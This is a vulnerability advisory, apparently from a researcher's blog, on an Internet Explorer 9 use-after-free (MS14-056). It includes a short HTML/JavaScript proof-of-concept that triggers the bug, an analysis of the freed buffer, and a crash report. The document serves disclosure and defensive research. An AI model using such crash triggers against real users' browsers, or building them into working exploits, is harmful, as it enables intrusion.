This is a friendly warning that your web-browser does not currently protecting your privacy and/or security as well as you might want. Click on this message to see more information about the issue(s) that were detected.

MSIE 9 MSHTML CAttr­Array use-after-free

(MS14-056, CVE-2014-4141)

Synopsis

A specially crafted web-page can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.

Known affected versions, attack vectors and mitigations

Repro.html <!doctype html> <script> // This Po­C attempts to exploit a use-after-free bug in Microsoft Internet // Explorer 9 // See http://blog.skylined.nl/20161101001.html for details. o­Text­Area = document.create­Element('textarea'); o­Text­Area.data­Src = 1; o­Text­Area.id = 1; o­Text­Area.inner­HTML = 1; o­Text­Area.onvolumechange = 1; o­Text­Area.style.set­Property('list-style', "url()"); // This work by Sky­Lined is licensed under a Creative Commons // Attribution-Non-Commercial 4.0 International License. </script>

Analysis

The CAttr­Array object initially allocates a CImpl­Ary buffer of 0x40 bytes, which can store 4 attributes. When the buffer is full, it is grown to 0x60 bytes. A new buffer is allocated at a different location in memory and the contents of the original buffer is copied there. The repro causes the code to do this, but the code continues to access the original buffer after it has been freed.

Exploit

If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.

Time-line

Bug­Id report: MSHTML.dll!Parse­List­Style­Property Arbitrary~FE0 AVR(3986463A) This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
id:             MSHTML.dll!Parse­List­Style­Property Arbitrary~FE0 AVR(3986463A)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x12D11FE0) in MSHTML.dll!Parse­List­Style­Property
note:           The exception happens in the main process. Based on this information, this is expected to be a critical security issue!
© Copyright 2016 by Sky­Lined.
Creative Commons License This work is licensed under a Creative Commons Attribution-Non‑Commercial 4.0 International License.

Last updated on 2016-11-21.
If you find this web-site useful and would like to make a donation, you can send bitcoin to 183yyxa9s1s1f7JBp­PHPmz­Q346y91Rx5DX.